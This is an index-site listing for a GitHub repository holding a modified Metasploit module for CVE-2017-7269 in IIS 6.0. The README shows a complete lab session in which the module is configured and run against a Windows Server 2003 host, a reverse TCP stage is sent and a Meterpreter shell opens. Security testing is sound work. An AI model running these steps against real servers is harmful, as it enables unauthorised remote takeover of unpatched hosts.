Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/zcgonvh/cve-2017-7269

fixed msf module for cve-2017-7269
https://github.com/zcgonvh/cve-2017-7269

Last synced: about 2 months ago
JSON representation

fixed msf module for cve-2017-7269

Host: GitHub
URL: https://github.com/zcgonvh/cve-2017-7269
Owner: zcgonvh
Created: 2017-03-30T22:20:36.000Z (almost 8 years ago)
Default Branch: master
Last Pushed: 2017-03-30T22:20:51.000Z (almost 8 years ago)
Last Synced: 2024-08-05T17:42:41.018Z (5 months ago)
Language: Ruby
Homepage:
Size: 1.95 KB
Stars: 134
Watchers: 5
Forks: 63
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - zcgonvh/cve-2017-7269 - fixed msf module for cve-2017-7269 (Ruby)

README

        ### fixed msf module for cve-2017-7269

fix not work when length of physical path not equal to 19,or has a host binding.

add options: `PhysicalPathLength`,`HttpHost`

for test:

host phyiscal path: `c:\inetpub\` , length=`11`

    

    msf > use exploit/windows/iis/cve-2017-7269

    msf exploit(cve-2017-7269) > show options

    

    Module options (exploit/windows/iis/cve-2017-7269):

    

       Name                Current Setting  Required  Description

       ----                ---------------  --------  -----------

       HttpHost            localhost        yes       http host for target

       PhysicalPathLength  19               yes       length of physical path for target(include backslash)

       RHOST                                yes       The target address

       RPORT               80               yes       The target port (TCP)

    

    

    Exploit target:

    

       Id  Name

       --  ----

       0   Microsoft Windows Server 2003 R2

    

    

    msf exploit(cve-2017-7269) > set rhost 192.168.223.130

    rhost => 192.168.223.130

    msf exploit(cve-2017-7269) > set rport 8088

    rport => 8088

    msf exploit(cve-2017-7269) > set physicalpathlength 11

    physicalpathlength => 11

    msf exploit(cve-2017-7269) > set httphost zcgonvh-test.com

    httphost => zcgonvh-test.com

    msf exploit(cve-2017-7269) > exploit

    [*] Started reverse TCP handler on 192.168.223.129:4444 

    [*] Sending stage (957487 bytes) to 192.168.223.130

    [*] Meterpreter session 1 opened (192.168.223.129:4444 -> 192.168.223.130:1135) at 2017-03-30 18:13:41 -0400

    meterpreter > sysinfo

    Computer        : ZCG-AA4B4E60208

    OS              : Windows .NET Server (Build 3790, Service Pack 2).

    Architecture    : x86

    System Language : zh_CN

    Domain          : WORKGROUP

    Logged On Users : 3

    Meterpreter     : x86/windows

    meterpreter >